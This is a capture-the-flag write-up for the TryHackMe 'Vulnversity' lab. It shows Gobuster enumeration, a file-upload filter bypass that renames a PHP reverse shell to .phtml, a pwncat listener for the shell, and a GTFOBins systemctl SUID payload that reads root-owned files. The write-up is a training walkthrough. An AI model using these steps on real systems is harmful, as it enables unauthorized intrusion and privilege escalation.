TryHackMe - Vulnversity (Easy)
{"author" : ["ret2basic"]}

Summary

Gobuster finds a hidden directory /internal which has an upload form. The upload form filters .php extension, but Burp Intruder finds that phtml bypasses the filter. Here we rename php-reverse-shell.php to php-reverse-shell.phtml and get a www-data shell.
On the victim machine, /bin/systemctl is SUID. Using an arbitrary file read payload on GTFOBins, we are able to read root.txt without getting a root shell.

IP

    RHOST: 10.10.64.243
    LHOST: 10.13.12.2

Nmap

Nmap

Gobuster

Run Gobuster against port 3333:
1
$ gobuster dir -u http://10.10.64.243:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
Copied!
Gobuster finds /internal:
Gobuster

www-data shell: File Upload with PHP Extension Bypass

There is an upload form in /internal:
/internal
Try uploading php-reverse-shell.php here. However, this file is not present in the /internal/uploads directory:
Upload failed
Perhaps the .php file extension is blocked. Brute-force valid file extensions using Burpsuite Intruder. Remember turn off "URL-encode these characters":
Uncheck "URL-encode these characters"
Make a PHP extension wordlist:
1
.php
2
.php3
3
.php4
4
.php5
5
.phtml
Copied!
Intruder finds that the only valid extension is .phtml:
.phtml is a valid extension
Rename the PHP reverse shell payload to php-reverse-shell.phtml and upload again. This time the file is successfully uploaded:
Upload succeeds
Start a pwncat listener:
1
$ sudo pwncat :443
Copied!
Trigger the reverse shell payload and get a user shell as www-data:
www-data shell

Arbitrary File Read: SUID /bin/systemctl

Search for SUID file:
1
find / -perm -u=s -type f 2>/dev/null
Copied!
Note that /bin/systemctl is SUID:
/bin/systemctl
GTFOBins has a privesc payload for systemctl. Change the payload to cat /root/root.txt > /tmp/output:
1
$ TF=$(mktemp).service
2
$ echo '[Service]
3
Type=oneshot
4
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
5
[Install]
6
WantedBy=multi-user.target' > $TF
7
$ /bin/systemctl link $TF
8
$ /bin/systemctl enable --now $TF
Copied!
Execute these commands line by line on the victim machine and read the content of root.txt:
root.txt
Last modified 2mo ago